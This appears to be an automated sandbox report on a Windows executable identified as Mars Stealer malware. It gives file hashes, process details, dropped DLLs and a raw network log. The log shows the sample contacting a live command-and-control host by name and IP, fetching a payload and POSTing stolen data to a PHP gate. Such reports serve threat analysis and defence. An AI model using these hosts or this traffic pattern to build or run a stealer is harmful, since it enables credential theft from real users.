Overview

overview

10

Static

static

3

1524f98475...8b.exe

windows7-x64

10

1524f98475...8b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    24/03/2024, 10:11 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1524f984753f60aa2b865ef86b79a58b.exe

  • Size

    159KB

  • MD5

    1524f984753f60aa2b865ef86b79a58b

  • SHA1

    07579a5c92e8cc92e3f391a5460d6de74310883b

  • SHA256

    6e2f1f2570bb49a0ff0e8b7e781f03d6e7f78798afe053ae373842ec42712702

  • SHA512

    8d8d34812091935ad4c90270d5df13c2a8e0f3f9a3a5752ba469a6d4972a36ea5696a087e47d65b1c13b36496e2fa87f0d99dd34119d5f3730ca9798db3855d2

  • SSDEEP

    3072:U53/H9YArDiGiDSDCosstkZtqJSp8Bb8EG:W3/WuDi3stJ8EG

Score
10/10
marsstealerdefaultdiscoveryspywarestealer

Malware Config

Extracted

Family

marsstealer

Botnet

Default

Signatures

Processes

  • C:\Users\Admin\AppData\Local\Temp\1524f984753f60aa2b865ef86b79a58b.exe
    "C:\Users\Admin\AppData\Local\Temp\1524f984753f60aa2b865ef86b79a58b.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    PID:2768

Network

  • flag-us
    DNS
    mars.mhsorteio.app.br
    1524f984753f60aa2b865ef86b79a58b.exe
    Remote address:
    8.8.8.8:53
    Request
    mars.mhsorteio.app.br
    IN A
    Response
    mars.mhsorteio.app.br
    IN A
    213.190.6.252
  • flag-us
    GET
    http://mars.mhsorteio.app.br/APwpnHWkYh.php
    1524f984753f60aa2b865ef86b79a58b.exe
    Remote address:
    213.190.6.252:80
    Request
    GET /APwpnHWkYh.php HTTP/1.1
    Host: mars.mhsorteio.app.br
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/7.4.33
    set-cookie: PHPSESSID=09b3e3051450e1856422ac45ccc39a3b; path=/
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    content-type: text/html; charset=UTF-8
    content-length: 244
    date: Sun, 24 Mar 2024 10:11:27 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
  • flag-us
    GET
    http://mars.mhsorteio.app.br/request
    1524f984753f60aa2b865ef86b79a58b.exe
    Remote address:
    213.190.6.252:80
    Request
    GET /request HTTP/1.1
    Host: mars.mhsorteio.app.br
    Cache-Control: no-cache
    Cookie: PHPSESSID=09b3e3051450e1856422ac45ccc39a3b
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    last-modified: Thu, 21 Mar 2024 12:30:39 GMT
    accept-ranges: bytes
    content-length: 2685679
    date: Sun, 24 Mar 2024 10:11:27 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
  • flag-us
    POST
    http://mars.mhsorteio.app.br/APwpnHWkYh.php
    1524f984753f60aa2b865ef86b79a58b.exe
    Remote address:
    213.190.6.252:80
    Request
    POST /APwpnHWkYh.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----OHLNY58Q9RQIE3E3
    Host: mars.mhsorteio.app.br
    Content-Length: 60551
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=09b3e3051450e1856422ac45ccc39a3b
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/7.4.33
    expires: Thu, 19 Nov 1981 08:52:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    pragma: no-cache
    content-type: text/html; charset=UTF-8
    content-length: 0
    date: Sun, 24 Mar 2024 10:11:36 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
  • 213.190.6.252:80
    http://mars.mhsorteio.app.br/APwpnHWkYh.php
    http
    1524f984753f60aa2b865ef86b79a58b.exe
    138.7kB
     2.8MB
     1541
    2001

    HTTP Request

    GET http://mars.mhsorteio.app.br/APwpnHWkYh.php

    HTTP Response

    200

    HTTP Request

    GET http://mars.mhsorteio.app.br/request

    HTTP Response

    200

    HTTP Request

    POST http://mars.mhsorteio.app.br/APwpnHWkYh.php

    HTTP Response

    200
  • 8.8.8.8:53
    mars.mhsorteio.app.br
    dns
    1524f984753f60aa2b865ef86b79a58b.exe
    67 B
     83 B
     1
    1

    DNS Request

    mars.mhsorteio.app.br

    DNS Response

    213.190.6.252

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \ProgramData\mozglue.dll
    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    Download Submit

  • \ProgramData\nss3.dll
    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

    Download Submit

  • memory/2768-0-0x0000000000400000-0x000000000043D000-memory.dmp

    Filesize

    244KB

    Download

  • memory/2768-1-0x0000000061E00000-0x0000000061EF3000-memory.dmp

    Filesize

    972KB

    Download

  • memory/2768-50-0x0000000000400000-0x000000000043D000-memory.dmp

    Filesize

    244KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.